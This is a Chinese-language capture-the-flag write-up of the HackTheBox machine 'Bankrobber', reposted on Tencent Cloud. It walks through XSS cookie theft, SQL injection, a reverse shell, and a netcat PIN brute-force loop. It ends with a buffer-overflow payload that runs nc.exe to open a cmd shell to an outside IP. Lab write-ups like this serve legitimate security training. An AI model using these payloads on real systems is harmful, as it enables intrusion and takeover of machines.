前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Hackthebox——Bankrobber

Hackthebox——Bankrobber

作者头像
Gcow安全团队
发布2020-03-06 12:01:52
4780
发布2020-03-06 12:01:52
举报
文章被收录于专栏:Gcow安全团队Gcow安全团队

nmap扫描到80、443、445、3306

web上可注册账号,注册后登陆,看到一个TransferE-coin的功能。

随便填了一点信息发送,提示管理员会看这个请求。

抓到这个请求,看到cookie这里是用户名和密码的base64加密,想到通过xss获得管理员的cookie来得到管理员的用户名密码。

构造payload后发包,成功获得管理员cookie,解密后获得管理员密码,成功登陆管理员账号。

登陆管理员账号后,第一个看到note.txt,告诉我们网站的路径。

页面最下面有个backdoorchecker,试试执行命令,提示我们只能在localhost执行。

页面中间有个搜索user的功能,测试后发现存在sql注入。

注入查看到backdoorchecker.php的源码。从源码内容中可知要执行命令只能从本地发送请求,前三个字符必须是dir。

结合之前那个xss的漏洞,构造一个反弹shell的payload,发送后成功反弹sehll,获得user.txt。

尝试了几个提权方法都没成功,后来在C盘根目录下看到一个可疑的程序,并且这个程序正在运行

转发端口到本地,nc连接本地910端口,提示需要4位的PIN码

forn in {0..9}{0..9}{0..9}{0..9};do echo $n;echo $n | nc -nv 127.0.0.1910; done

爆破得到PIN码,连接后测试发现输入e-coins存在溢出

利用溢出成功获得system权限,获得root.txt。

12345678901234567890123456789012C:\Users\Cortin\nc.exe-e cmd.exe 10.10.14.149 4447

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-03-04,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Gcow安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
访问管理
访问管理(Cloud Access Management,CAM)可以帮助您安全、便捷地管理对腾讯云服务和资源的访问。您可以使用CAM创建子用户、用户组和角色,并通过策略控制其访问范围。CAM支持用户和角色SSO能力,您可以根据具体管理场景针对性设置企业内用户和腾讯云的互通能力。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档